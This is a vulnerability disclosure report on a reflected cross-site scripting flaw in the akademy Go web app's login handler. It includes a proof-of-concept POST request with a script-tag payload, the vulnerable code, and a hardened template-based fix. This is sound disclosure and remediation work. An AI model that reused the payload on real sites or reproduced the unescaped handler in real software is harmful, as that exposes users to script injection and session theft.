Submission #397340: alwindoss akademy None Cross-site Scripting (XSS) Info

Title: alwindoss akademy None Cross-site Scripting (XSS)
Description: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go

Flaw reason: at line 40 of cmd/akademy/handler/handlers.go, the email address supplied by the user (obtained from the form values) is written directly into the response without any filtering or escaping. This results in reflected XSS. When a malicious user submits an email address containing a script, the script is executed in the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more.

Vulnerability POC: suppose a malicious user enters an email address containing a <script> tag, such as <script>alert('XSS');</script>. When other users visit this page, their browsers execute this JavaScript and an alert box with the text "XSS" pops up, which demonstrates the vulnerability.

cmd/akademy/handler/handlers.go:

```go
// HandleLogin implements PageHandler.
func (h pageHandler) HandleLogin(w http.ResponseWriter, r *http.Request) {
	fmt.Println("Handle Login")
	r.ParseForm()
	email := r.FormValue("emailAddress")
	fmt.Println("Email", email)
	w.Write([]byte(email))
}
```

POC:

```
POST /login HTTP/1.1
Host: 192.168.1.7:8080
Content-Length: 148
Cache-Control: max-age=0
Origin: http://192.168.1.7:8080
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.7:8080/login
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5
Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas=
Connection: keep-alive

csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script>
```
![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
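The following is an added example, not code from the akademy project or from the report above. It places the reported handler (reproduced as `HandleLoginVulnerable`) beside a hypothetical hardened rewrite, `HandleLoginSafe`, which renders the same `emailAddress` form field through Go's `html/template` so that the value is HTML-escaped before it reaches the browser, and sets an explicit `Content-Type` with `X-Content-Type-Options: nosniff`. `RenderLogin` drives either handler with a constructed form POST via `net/http/httptest` so the two responses can be compared offline; the template, the helper names and the sample inputs are assumptions made for this example.

```go
package main

import (
	"fmt"
	"html/template"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// HandleLoginVulnerable mirrors the handler quoted in the report: the form
// value is written to the response byte-for-byte. With no Content-Type set,
// net/http sniffs the body, and a body starting with a tag is served as HTML.
func HandleLoginVulnerable(w http.ResponseWriter, r *http.Request) {
	r.ParseForm()
	email := r.FormValue("emailAddress")
	w.Write([]byte(email))
}

// loginTmpl is an assumed page template. html/template escapes {{.Email}}
// according to the context it appears in (here: HTML text content).
var loginTmpl = template.Must(template.New("login").Parse(
	`<!doctype html><p>Logged in as {{.Email}}</p>`))

// HandleLoginSafe is a hypothetical hardened replacement. It reads the same
// field, renders it through the template, and declares the content type
// explicitly so the browser does not sniff the response.
func HandleLoginSafe(w http.ResponseWriter, r *http.Request) {
	if err := r.ParseForm(); err != nil {
		http.Error(w, "bad form", http.StatusBadRequest)
		return
	}
	email := r.FormValue("emailAddress")
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	w.Header().Set("X-Content-Type-Options", "nosniff")
	if err := loginTmpl.Execute(w, struct{ Email string }{email}); err != nil {
		http.Error(w, "render failed", http.StatusInternalServerError)
	}
}

// RenderLogin sends a constructed POST /login carrying emailAddress=email to
// the given handler and returns the response body as a string.
func RenderLogin(h http.HandlerFunc, email string) string {
	form := url.Values{"emailAddress": {email}}
	req := httptest.NewRequest(http.MethodPost, "/login", strings.NewReader(form.Encode()))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	rec := httptest.NewRecorder()
	h(rec, req)
	return rec.Body.String()
}

// ReflectsRawTag reports whether a body still contains an unescaped <script
// tag, i.e. whether the reflected value would be parsed as markup.
func ReflectsRawTag(body string) bool {
	return strings.Contains(strings.ToLower(body), "<script")
}

func main() {
	// Constructed input, the same shape as the payload in the report.
	payload := "<script>alert(1)</script>"
	fmt.Println("vulnerable:", RenderLogin(HandleLoginVulnerable, payload))
	fmt.Println("hardened:  ", RenderLogin(HandleLoginSafe, payload))
}
```

Run with `go run .`; the first line echoes the tag verbatim, the second shows it as `&lt;script&gt;alert(1)&lt;/script&gt;` inside the paragraph, which a browser displays as text rather than executing. Output encoding at the point where the value enters the page is the fix; input filtering on the email field alone is not sufficient, since the same value may later be rendered in other contexts.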
Source: https://github.com/alwindoss/akademy/issues/1
User: zihe (UID 56943)
Submitted: 2024-08-24 10:42 AM (2 years ago)
Moderation: 2024-09-04 08:58 AM (11 days later)
Status: Accepted
VulDB Entry: 276487 [alwindoss akademy up to 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress cross site scripting]
Points: 20
